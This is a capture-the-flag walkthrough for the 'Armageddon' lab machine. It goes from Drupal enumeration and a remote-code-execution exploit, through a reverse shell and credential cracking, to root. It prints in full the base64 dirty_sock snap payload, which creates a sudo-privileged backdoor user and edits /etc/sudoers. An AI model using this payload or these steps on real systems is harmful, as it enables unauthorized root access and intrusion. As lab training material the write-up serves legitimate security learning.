# Armageddon! ## @author : M3tr1c_r00t  ## Enumeration You know the drill, nmap to see the open ports.  Only two ports are open:22 ssh and 80. Next, we do a gobuster scan with the following options: gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://IP -o gobusterlight.txt  on Visiting the sight, we can see that its a drupal site...  We can visit the robots.txt file in the server and see there's a changelog file...  The CHANGELOG.txt file reveals to us that the server is running drupal 7.55.... nice!  We can now use searchsploit and see if there are any exploits for this version of drupal...  One exploit which seems to be interesting is the RCE(Remote Code Execution) one. We can get that exploit to our current directory and check out its options.  Here's how it works... Assign the script the server's IP and then run it . If it brings out an error, try installing the helpline ruby library using: sudo apt-get update -y ruby-helpline -y  And we get a reverse shell;though a weak one. We can improve our reverse shell by gaining onether using netcat so that its better and more responsive...  We will have to save our bash script in the html form so that we can upload it. There was some error when uploading with the ".sh" extension.... probably some filtering was been done by the site.... The "wget" command wasnt avaialable so i used curl and output the contents of my file into a new one on the system.  Next set up a listener and on the shell script, execute the file using bash and you get your shell.  Checking out the directories and files in the system, and on cheking out the site directory.... i find a config file in which has some creds.  After a bit of dead ends, i checked out the mysql inbuilt server and we got access,  I found a users table and we got more creds....  I used johntheripper to crackthepassword and boom! we got the password.  I tried to login into ssh using the password and it worked!  ## Priv Escalation Checking sudo -l , we can see that we can run the sudo command which installing a package from snap... There's an exploit package that I got from 0xdf's site  The exploit is known as dirty_sock. It creates a new user with root permissions. Here's the **code:** python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > your_file_name  After executing the file, you can cat /etc/passwd and see the dirty_sock user.. Move to the user and the password is the same as the username:dirty_sock Then you can now move to the root user.  and you can get the root flag! And done! My socials: <br>@ twitter: twitter.com/M3tr1c_root <br>@ instagram: instagram.com/m3tr1c_r00t/